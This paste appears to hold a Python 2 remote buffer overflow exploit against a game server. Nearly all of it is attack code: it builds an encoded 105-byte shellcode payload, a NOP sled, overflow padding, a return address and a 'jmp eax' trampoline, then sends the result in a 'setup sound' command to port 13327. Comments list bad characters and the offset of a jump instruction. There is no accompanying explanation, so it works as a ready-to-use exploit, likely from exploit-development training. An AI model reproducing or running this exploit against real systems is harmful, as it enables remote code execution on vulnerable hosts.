Author: Not specified Language: text
Description: Not specified Timestamp: 2017-09-07 00:10:43 +0000
View raw paste Reply
  1. #!/usr/bin/python
  2. import socket
  3.  
  4. #payload size = 105
  5. payload = ("\xbf\xbe\xb0\xb3\xfc\xdb\xc6\xd9\x74\x24\xf4\x5e\x31\xc9\xb1"
  6. "\x14\x83\xc6\x04\x31\x7e\x10\x03\x7e\x10\x5c\x45\x82\x27\x57"
  7. "\x45\xb6\x94\xc4\xe0\x3b\x92\x0b\x44\x5d\x69\x4b\xfe\xfc\x23"
  8. "\x23\x03\x01\xd5\xef\x69\x11\x84\x5f\xe7\xf0\x4c\x39\xaf\x3f"
  9. "\x10\x4c\x0e\xc4\xa2\x4a\x21\xa2\x09\xd2\x02\x9b\xf4\x1f\x04"
  10. "\x48\xa1\xf5\x3a\x37\x9f\x89\x0c\xbe\xe7\xe1\xa1\x6f\x6b\x99"
  11. "\xd5\x40\xe9\x30\x48\x16\x0e\x92\xc7\xa1\x30\xa2\xe3\x7c\x32")
  12.  
  13. host="127.0.0.1"
  14. #crash="\x41" * 4379
  15. ret="\x97\x45\x13\x08"
  16. #crash="\x41"*4368 + ret + "\x83\xC0\x0C\xFF\xE0" + "\x90"*2
  17. crash="\x90"*10 + payload + "\x41" * (4368-10-105) + ret + "\x83\xC0\x0C\xFF\xE0" + "\x90"*2
  18. #DELETE eip="\x42"*4
  19. #badchars \x00.\x0a,\x0d,\x20
  20. # nasm > jmp eax
  21. # 00000000  FFE0              jmp eax
  22. # nasm > add eax,12
  23. # 00000000  83C00C            add eax,byte +0xc
  24. # nasm >
  25. #jmp,esp located at 08134597
  26.  
  27. buffer = "\x11(setup sound " + crash + "\x90\x00#"
  28. #buffer = "\x11(setup sound " + pattern + "\x90\x00#"
  29.  
  30. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  31.  
  32. print "[*] Sending evil buffer..."
  33. s.connect((host, 13327))
  34. s.send(buffer)
  35. data = s.recv(1024)
  36. print data
  37. s.close()
  38. print "[*]Payload Sent !"
View raw paste Reply